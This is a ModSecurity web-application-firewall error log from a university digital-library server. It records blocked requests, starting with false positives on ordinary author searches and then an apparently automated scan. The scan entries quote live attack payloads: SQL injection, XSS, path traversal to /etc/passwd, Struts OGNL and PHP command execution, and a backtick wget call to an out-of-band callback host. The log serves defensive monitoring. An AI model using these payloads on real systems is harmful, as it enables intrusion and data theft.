[Tue Aug 29 06:52:38.402368 2023] [:error] [pid 60603] [client 85.208.96.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Youngseek Kim\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0zRsCo-f0AAOy7lDcAAAAJ"]
[Tue Aug 29 07:06:00.975386 2023] [:error] [pid 61197] [client 85.208.96.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Engineering\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO02aMCo-f0AAO8NqKMAAAAA"]
[Tue Aug 29 07:12:15.738866 2023] [:error] [pid 61409] [client 85.208.96.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Introduction\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0338Co-f0AAO-hILcAAAAA"]
[Tue Aug 29 07:27:30.081182 2023] [:error] [pid 61581] [client 85.208.96.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22RR. K. N. Sari\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO07csCo-f0AAPCNm6IAAAAE"]
[Tue Aug 29 07:38:14.843096 2023] [:error] [pid 61539] [client 216.244.66.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22imperfect preventive maintenance\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO099sCo-f0AAPBj3EAAAAAZ"]
[Tue Aug 29 07:41:21.988609 2023] [:error] [pid 61788] [client 216.244.66.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22cooperative and noncooperative game theory\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0@scCo-f0AAPFcejQAAAAF"]
[Tue Aug 29 09:29:43.820846 2023] [:error] [pid 63590] [client 216.244.66.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22TF and TA methodologies\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1YF8Co-f0AAPhmxngAAAAG"]
[Tue Aug 29 09:31:35.991381 2023] [:error] [pid 63498] [client 216.244.66.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Ant\\xc3\\xb4nio M\\xc3\\xa1rcio Tavares Thom\\xc3\\xa9\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1Yh8Co-f0AAPgK@IQAAAAI"]
[Tue Aug 29 09:34:50.020947 2023] [:error] [pid 63670] [client 66.249.70.103] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Fanfan Zhu\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1ZSsCo-f0AAPi24PEAAAAY"]
[Tue Aug 29 09:51:24.068089 2023] [:error] [pid 64144] [client 52.167.144.210] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22W.Gleen Steele\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1dLMCo-f0AAPqQvl4AAAAQ"]
[Tue Aug 29 09:54:02.452392 2023] [:error] [pid 64100] [client 40.77.167.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Jun Yuan\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1dysCo-f0AAPpk7hYAAAAC"]
[Tue Aug 29 11:18:50.371588 2023] [:error] [pid 668] [client 52.167.144.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Sauvain,Harry\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1xqsCo-f0AAAKcIxwAAAAA"]
[Tue Aug 29 11:21:31.282286 2023] [:error] [pid 725] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:a: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO1yS8Co-f0AAALVrnYAAAAR"]
[Tue Aug 29 11:21:35.760521 2023] [:error] [pid 734] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:s: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO1yT8Co-f0AAALeU38AAAAB"]
[Tue Aug 29 11:30:10.854874 2023] [:error] [pid 959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:props_doctor_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:props_doctor_id: 1,2) AND (SELECT 42 FROM (SELECT(SLEEP(6)))b"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10UsCo-f0AAAO-1m0AAAAI"]
[Tue Aug 29 11:30:10.920813 2023] [:error] [pid 920] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:uri. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:uri: {{228*'98'}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/actions/seomatic/meta-container/meta-link-container/"] [unique_id "ZO10UsCo-f0AAAOYZhMAAAAB"]
[Tue Aug 29 11:30:11.786708 2023] [:error] [pid 966] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:uri. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:uri: {{228*'98'}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/actions/seomatic/meta-container/all-meta-containers"] [unique_id "ZO10U8Co-f0AAAPGfq4AAAAV"]
[Tue Aug 29 11:30:12.740241 2023] [:error] [pid 973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(ver)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VMCo-f0AAAPNBPYAAAAZ"]
[Tue Aug 29 11:30:13.436395 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pagina. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../ found within ARGS:pagina: ../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/i3geo/exemplos/codemirror.php"] [unique_id "ZO10VcCo-f0AAAOM4UEAAAAU"]
[Tue Aug 29 11:30:13.486696 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(id)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VcCo-f0AAAPLwBgAAAAX"]
[Tue Aug 29 11:30:15.329853 2023] [:error] [pid 867] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=(44660*44784)).(#q)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/integration/saveGangster.action"] [unique_id "ZO10V8Co-f0AAANjpwMAAAAT"]
[Tue Aug 29 11:30:15.362756 2023] [:error] [pid 973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:user_id: 11 UNION ALL SELECT NULL,CONCAT(1,md5(999999999),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10V8Co-f0AAAPNBQAAAAAZ"]
[Tue Aug 29 11:30:16.317000 2023] [:error] [pid 960] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{\\\\"url\\\\":\\\\"http://cjmn8l5jmimk2adbbnlg394gne1bgy98h.oast.site\\\\"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x5c\\x5c\\x22url\\x5c\\x5c\\x22:\\x5c\\x5c\\x22http://cjmn8l5jmimk2adbbnlg394gne1bgy98h.oast.site\\x5c\\x5c\\x22}: {\\x5c\\x22url\\x5c\\x22:\\x5c\\x22http://cjmn8l5jmimk2adbbnlg394gne1bgy98h.oast.site\\x5c\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/wp-json/visualizer/v1/upload-data"] [unique_id "ZO10WMCo-f0AAAPAeyAAAAAL"]
[Tue Aug 29 11:30:17.596216 2023] [:error] [pid 984] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9277=9277 found within ARGS:debit: (CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10WcCo-f0AAAPY1rkAAAAh"]
[Tue Aug 29 11:30:19.673313 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:start_hour. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:start_hour: ;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/nightled.cgi"] [unique_id "ZO10W8Co-f0AAAOKNmsAAAAK"]
[Tue Aug 29 11:30:20.517376 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpas_keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')/**/ found within ARGS:wpas_keys: 1')/**/AND/**/(SELECT/**/5202/**/FROM/**/(SELECT(SLEEP(6)))yRVR)/**/AND/**/('dwQZ'/**/LIKE/**/'dwQZ"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/wp-autosuggest/autosuggest.php"] [unique_id "ZO10XMCo-f0AAAPXAjoAAAAi"]
[Tue Aug 29 11:30:22.312138 2023] [:error] [pid 865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/devices.inc.php"] [unique_id "ZO10XsCo-f0AAANh1pkAAAAA"]
[Tue Aug 29 11:30:22.682971 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlgwo3kyadn6fy17.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/Collector/diagnostics/ping"] [unique_id "ZO10XsCo-f0AAAPXAkYAAAAi"]
[Tue Aug 29 11:30:23.324346 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:email: 1' or sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/forgot_password.php"] 